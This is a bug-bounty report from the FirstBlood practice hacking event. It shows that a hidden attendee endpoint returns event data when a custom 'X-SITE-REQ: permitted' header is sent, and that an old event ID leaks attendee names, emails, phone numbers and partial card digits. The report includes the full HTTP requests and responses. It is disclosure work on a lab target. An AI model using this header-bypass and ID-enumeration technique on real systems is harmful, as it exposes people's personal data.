FirstBlood-#70Info leak at http://firstbloodhackers.com:49280/attendees/event.php?q=560720



On 2021-05-09, 0xconft reported:

Hi there,

When i accessing http://firstbloodhackers.com:49280/hackerback.html event. I notice this endpoint in it's source

    <script>
       function getAttendees() {
        var attending = false;

        if (attending == true) {
            sendRequest("/attendees/event.php?q=560720");
       }
    </script>

When i access that endpoint it's return nothing. But when i add "X-SITE-REQ: permitted" header it's return data of that event

GET /attendees/event.php?q=560720 HTTP/1.1
Host: firstbloodhackers.com:49280
X-SITE-REQ: permitted
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 19:41:33 GMT
Content-Type: application/json
Connection: close
Content-Length: 3267

{"event":[{"id":"560720","title":"HackerBack","description"
-snip-

Nothing interesting from the response except the "old_eventID" parameter that contain the old event id. Which if i accessed the sameway with X-SITE-REQ header it return user's sensitive data

GET /attendees/event.php?q=560700 HTTP/1.1
Host: firstbloodhackers.com:49280
X-SITE-REQ: permitted
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 19:43:21 GMT
Content-Type: application/json
Connection: close
Content-Length: 3622

-snip-
medical-massage.","when":"Monday, May 9th 2021","time":"1:00 - 3:00pm","attendees":[{"name":"Sean R","email":"[email protected]","confirmed":true,"contactNumber":"+44 141 496 0250","last_4_CC":"9090"},{"name":"Trevor B","email":"[email protected]","confirmed":true,"contactNumber":"+44 116 496 0581","last_4_CC":"5323"},{"name":"Julie
-snip-

Best Regards, 0xconft

P1 CRITICAL

Endpoint: /attendees/event.php?q=560700

Parameter: X-SITE-REQ header

Payload: permitted


FirstBlood ID: 13
Vulnerability Type: Info leak

/attendees/event can be seen on the HackerBack.html page but has a blank response. Upon further inspection and from making use of the web app, you will notice you can add certain headers in order to interact with this endpoint. An old event ID leaks PII information about attendees.


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.